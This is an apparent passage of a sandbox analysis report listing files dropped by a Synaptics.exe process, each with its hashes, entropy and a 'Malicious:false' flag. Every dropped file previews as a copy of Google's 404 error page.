                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.272624854150294
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0pSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+q+pAZewRDK4mW
                                                                                                                                                                                        MD5:C3BA381FA4B0A3A96037636563EEECA2
                                                                                                                                                                                        SHA1:B760015759B3EB772E11CCFF473AAF7AEC20A9C9
                                                                                                                                                                                        SHA-256:853508742DFB8D5E88D6B52CB31269B6444CA4A3568B7F35D91AC00952D09B55
                                                                                                                                                                                        SHA-512:B8427AB8BC51F18C593D95057DDBD4A1FCF75BCBC7CC264535259021199719942FD6B901B0775B4F4221EFED6DB74DB95C561D82C65EBE45BDB8C13827570529
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j3ZzE5Cx4IWoDXTaGHNiOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Lhbw6wV.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2678154514629165
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+3+pAZewRDK4mW
                                                                                                                                                                                        MD5:E57A10396AA938539399FEBB0601F722
                                                                                                                                                                                        SHA1:30C36719A3781729D3C67EE32396016152227F8D
                                                                                                                                                                                        SHA-256:79C7754FB8A8B1FB2E811067E1E0EDD150CE51990CDACB90E7AE3028345DE757
                                                                                                                                                                                        SHA-512:59A456DF275D33B3C0A8E1EDCB5AC2FF9D5E448AA82086770FF9B4A0F821C053AF68C5D9EC5E0F8901AB675220D01BE409FE693D16860EAC6772295581995DE0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A6oNlp6XzKd3pjN45SYf7A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\M8iDGOo.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.24925496388245
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+04J4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+s+pAZewRDK4mW
                                                                                                                                                                                        MD5:2319CA6418EF8FAB0F32CAD13E013CC8
                                                                                                                                                                                        SHA1:C764078C0D4F68E60071595AE5BA351115EA7F00
                                                                                                                                                                                        SHA-256:426B9CCFDF32A4F183D0436D0C546D9C5BFCCC7BA9198C00132F82CCC35B228A
                                                                                                                                                                                        SHA-512:3A9F2C49CC46AD9E4FACFDCB547120FBCC11CBE9F6035F043665D9F9C1EDAF796672D1A83373CF9C7D7ED08CCA3BB93509447EAF1AF2A09F766DF3A039217FF3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2hgtvHlX1iPk6uq/feoZZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MDuUFJ3.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2659398742525285
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+k+pAZewRDK4mW
                                                                                                                                                                                        MD5:157D1304BF3025E1D4C10738134BB894
                                                                                                                                                                                        SHA1:9096A2AC6358A5A2D9E9B3ECBA72B32003EA952C
                                                                                                                                                                                        SHA-256:CAADA58943CDD01E63D47D69D8D17CBDBDE2829A1B8A765303116B4FFA7EAA7A
                                                                                                                                                                                        SHA-512:583B4B6979AD9F3215CD441CB59E8A9EF36BAE8C01AE75A5EC267DE65BAD34DAFD3AC7AC1F04202AD4B0823B2F131A9FD82761D901B3463F963B168A317D0155
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CIGc3TagrSbMH8iCQj1RHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MXBGKPl.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.270070042457531
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6+pAZewRDK4mW
                                                                                                                                                                                        MD5:CFA02E6D625C65C4B481335CB53744B6
                                                                                                                                                                                        SHA1:887516ADD63A202E4D1BD5F394C6D34AF246370F
                                                                                                                                                                                        SHA-256:5DB0AF316BF8607880C3A35372094D15EE36197BC9EE70EAB358B2B4296E6295
                                                                                                                                                                                        SHA-512:F035BB6944FD0C3597AFD17ABFCCE480603741A87FD611C3B9308F2BA020BAFBA277A272E75A0B527C1693B53E9FDCCADB775CAA9760F6831544F5EC514029CD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fV2PYvZXJwBHqplhG8TGxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MgflK7n.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.271439691569846
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0vXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Y+pAZewRDK4mW
                                                                                                                                                                                        MD5:DF6A8B006F66975B5E14683279CE0965
                                                                                                                                                                                        SHA1:54B96D901C50F563C2E14044110389A03C879439
                                                                                                                                                                                        SHA-256:5DBB8C7739F65D52FAB0820976F0745040526914891EAEF22BFDB02F2B51F06B
                                                                                                                                                                                        SHA-512:2D96CFCBE176688E7F6D4E06ED1AD8F39D2AA9CC560256BC53BF3D42E75F5B363257EEFC65994F109E6E5E57360F2DE15F8E9A8E4898BA53958EFD72D22E74D8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OcIAYZ3RBZ9Aq0odVAyraQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\NJpUdBg.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259999758708614
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0qgDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+KD+pAZewRDK4mW
                                                                                                                                                                                        MD5:B1A33E011AF089A99A23ACE29F927DD5
                                                                                                                                                                                        SHA1:02BB683CF6E0BEA100DE6CAB4EF28FC54F792E25
                                                                                                                                                                                        SHA-256:CAF5E91B8FCF79FF419C25A02E13D5EF2663FF7C19EED83934D503205FA1BC11
                                                                                                                                                                                        SHA-512:B4F34E148F0A5AC39BDBADF5923E0C9C27C1484549FD22A70E2361469FD20BC2197252055DAE85D7FBC040EEE687A03982B956821FD023A8B113ACE774659741
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ti1QIw43qUt6ov8ftKZVgw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\NM1ka38.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.267070342685288
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0gzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+fz+pAZewRDK4mW
                                                                                                                                                                                        MD5:4B6428F8367B49D3202BA679BE40A8E2
                                                                                                                                                                                        SHA1:2CBDA31BE7BF548B03EF2B3D76309FD26D368F00
                                                                                                                                                                                        SHA-256:58C2B8EE2D4015ADD9AA27F3CE7C2B726B365E47B824A32A1EFB0B54BBD06424
                                                                                                                                                                                        SHA-512:FF8A9CB1D4B1EA5BCA5206A1ABF2DC83C606E3F77E79691DAE385F4325049AA2ED877ED800E9FE391367BE1DF8B2AA1C4BA1407D17EFBD22C9147D9CF20172E4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7T3AY7BxB6mhVpOemVORLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Nd5nANB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.275326610280699
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0qaISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+7+pAZewRDK4mW
                                                                                                                                                                                        MD5:9FF1C95ACFD030139BACC879E6842216
                                                                                                                                                                                        SHA1:AC838CC26D49A381D054CF635DDDE8551BFFE73B
                                                                                                                                                                                        SHA-256:8479AAB7AC1F03475B7EBDE8AB7FEACDF33DE902B4BBC6EDA2E66CF67D39A074
                                                                                                                                                                                        SHA-512:4CA4A3D5E1A5D5B3B63D3CEE6EA4E6FF0D314D1B65C9B69407C40A56DF2626C32979F1BA06829AB02F7C09DBA199185B2250C1511BE64567E40C8F17F2355B43
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HGdil6DVjvGPu8KLxJUN0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\NoRoNOc.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2564428521274
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+01EySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+qEy+pAZewRDK4mW
                                                                                                                                                                                        MD5:27A5CFB0C6051A36EC9708E912ABBCF1
                                                                                                                                                                                        SHA1:5E63374EEFD7FF96D39B972B3888D435973F4BF9
                                                                                                                                                                                        SHA-256:D118CFC4FAD6A7862EAA214A372A94975A96B3F2CF7F9F805D5731ECC8169AD0
                                                                                                                                                                                        SHA-512:89F67340F28320315CB2D5334872BCDA8B65DD5786807738A2D9FFAD7EB0AECEDFC1F1A2282E8376546435D3524EEAAD46DD8FDED9068AF23C327119E87160B6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X0orjs8jCWOVjKmm/G5oog">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\NxFws6s.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.253072747206368
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0GSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+R+pAZewRDK4mW
                                                                                                                                                                                        MD5:EEFFD4D87D383143D3279B8EE2D1DC9E
                                                                                                                                                                                        SHA1:BF02AFCE7894C535A308BCED6119FE28565FE152
                                                                                                                                                                                        SHA-256:586D0AD212F82FCC13008B1FD030735516C15AA3EE0456DB41DCCF7E679FFBF6
                                                                                                                                                                                        SHA-512:5E7258A89E6C59D3F775E8DD570E56B9DC58D041C37D28275B71FA588C6F1BB954AC043F694AE34A193F8F7F7531F44846121B2E0AC7E68D9987988F2F70D17D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gEXhK1Grz7pVkb2l5VtywQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OXkp67i.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2664727504264075
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
                                                                                                                                                                                        MD5:34C6A53F3A8C0ADFB5DE1A7E8ECE832D
                                                                                                                                                                                        SHA1:8D2F98255DD4DF40E6D3DE64995E8F344DB1F6AF
                                                                                                                                                                                        SHA-256:2FFA446938E4EA6ACC303AE50D437425C008139A10B9124BC16E844A738698F1
                                                                                                                                                                                        SHA-512:E5C859B884A34582BD22B5ACF4DB75C35F5B2539687EF629EEE3C100D58135263A12B24B0E26834A7E9EB096E851A83886872C02E4CA01875C28FA3CB303C23B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zZ3pblMExdrYDNK5wyXTQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Ou39Kno.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2680568157802705
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ikSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+5k+pAZewRDK4mW
                                                                                                                                                                                        MD5:DC01655B749D033C93C42206DF7E93A1
                                                                                                                                                                                        SHA1:459A3E4BC1DEA6793EDBF38E290420021262F483
                                                                                                                                                                                        SHA-256:685B73D2804125C6D2BEB0BE6803631E0B54A9877A833A5EF110B5FD6EF7D62C
                                                                                                                                                                                        SHA-512:9F61D8A51C6BD70714AF088F05EE28C2141AA75AE65E808E5582D3748AD15A3318F4646C5A4B81B8E34C749EDCF2630A513C9791401EE1F2A6C939A2D61AF32B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A/uEFHLeNQRvlNgTv5LXYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OwSMbir.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.249445928291836
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+C+pAZewRDK4mW
                                                                                                                                                                                        MD5:F583126574BF07F290287B8661A7EC19
                                                                                                                                                                                        SHA1:C6CA8B21C5A9E7CE4CF0DCE217930E4F165CC9EE
                                                                                                                                                                                        SHA-256:54698D1D8D98E7A794A2216D66B4CF4E5B090FB936267943C27AB72A16679DCA
                                                                                                                                                                                        SHA-512:BD6EE2F0322EB5478FD21587569EC008CB7C03BEA22CA685D4F908281B51D1EA8434521063235D0DE1D33784D90157EA1A93FC76BB02551DB48AE31975DC5CC2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VhPzIpEhkhrd4rznd4T1Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

